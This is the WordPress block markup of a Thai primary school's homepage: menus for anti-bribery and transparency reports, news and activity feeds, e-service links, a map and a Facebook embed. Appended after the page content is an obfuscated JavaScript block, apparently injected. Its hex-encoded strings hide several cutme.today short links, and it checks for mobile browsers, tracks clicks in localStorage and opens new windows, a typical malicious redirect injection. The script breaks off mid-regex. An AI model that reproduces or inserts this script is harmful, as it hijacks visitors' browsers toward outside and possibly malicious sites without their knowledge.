/wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette5, #444444)\",\"titleColorActive\":\"var(\\u002d\\u002dglobal-palette5, #444444)\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgActive\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBorderActive\":\"#bcbcbc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 